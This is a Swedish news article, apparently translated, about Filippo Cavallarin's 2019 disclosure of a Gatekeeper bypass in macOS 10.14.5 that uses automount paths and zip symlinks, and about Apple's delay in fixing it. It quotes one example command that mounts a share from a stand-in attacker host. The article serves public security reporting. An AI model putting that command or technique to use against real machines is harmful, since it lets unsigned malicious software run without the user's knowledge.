Det är enkelt att installera en skadlig app på en Mac. Apple har inte åtgärdat felet ens efter tre månader

27. 5. 2019

Säkerhetsforskaren Filippo Cavallarin publicerade en varning om felet i macOS 10.14.5 på sin blogg. Detta består i möjligheten att helt kringgå Gatekeepers säkerhetsåtgärder. Enligt Cavallarin påpekade han felet för Apple redan i februari i år, men företaget fixade det inte i den senaste uppdateringen.

Gatekeeper utvecklades av Apple och inkorporerades i sitt skrivbordsoperativsystem för första gången 2012. Det är en mekanism som förhindrar att en applikation körs utan användarens vetskap och samtycke. När du har laddat ner en app kontrollerar Gatekeeper automatiskt dess kod för att se om programvaran är korrekt signerad av Apple.

I sitt blogginlägg uppger Cavallarin att Gatekeeper som standard anser att både extern lagring och nätverksresurser är säkra platser. Alla applikationer som finns i dessa mål kan därför startas automatiskt utan att behöva gå igenom Gatekeeper-kontrollen. Det är denna funktion som kan utnyttjas för att starta skadlig programvara utan användarens vetskap.

En aspekt som tillåter obehörig åtkomst är automount-funktionen, som gör att användare automatiskt kan montera en nätverksresurs genom att helt enkelt ange en sökväg som börjar med "/net/". Som ett exempel nämner Cavallarin sökvägen "ls /net/evil-attacker.com/sharedfolder/" som kan få operativsystemet att ladda innehållet i en "sharefolder"-mapp på en avlägsen plats som kan vara potentiellt skadlig.

Du kan se hur hotet fungerar i videon:

En annan faktor är det faktum att om ett zip-arkiv som innehåller en specifik symbollänk som leder till automount-funktionen delas, kommer det inte att kontrolleras av Gatekeeper. På så sätt kan offret enkelt ladda ner det skadliga arkivet och packa upp det, vilket gör att angriparen kan köra praktiskt taget vilken programvara som helst på Mac utan användarens vetskap. Finder, som döljer vissa tillägg som standard, har också sin del av denna sårbarhet.

Cavallarin uppger på sin blogg att Apple uppmärksammade macOS-operativsystemets sårbarhet den 22 februari i år. Men i mitten av maj slutade Apple att kommunicera med Cavallarin, så Cavallarin bestämde sig för att göra det hela offentligt.

källa: FCVL

Ämnen: lagring, automatisk, MacOS, video-, inställningar, fungera, användare, aplikace, Apple

Diskussion av artikeln

Ditt namn

Din kommentar

Genom att fylla i ovanstående uppgifter bekräftar jag att företaget TEXT FACTORY s.r.o., med säte i Brno, Durďákova 336/29, Černá Pole, Postnummer: 613 00, ID-nummer: 06157831, registrerat vid Regionaldomstolen i Brno , infoga 100399, kommer att behandla mina personuppgifter som lämnats i registreringsformuläret som jag fyllt i på grundval av TEXT FACTORY s.r.o.s legitima intressen enligt artikel 6 punkt 1 brev f) GDPR och för att uppfylla rättsliga skyldigheter (Artikel 6, punkt 1, bokstav c) GDPR), i följande syften: nödvändigheten att säkerställa auktorisering av besökare på webbplatser som drivs av TEXT FACTORY s.r.o. att bidra aktivt till publicerade artiklar eller inom diskussion forum och utöva rättigheterna för TEXT FACTORY s.r.o. som administratör för dessa diskussionsforum. Mer information om behandling av personuppgifter och rättigheter finns i Lektioner om skydd av personuppgifter. hela texten

Det kan vara intresserar dig

Relaterad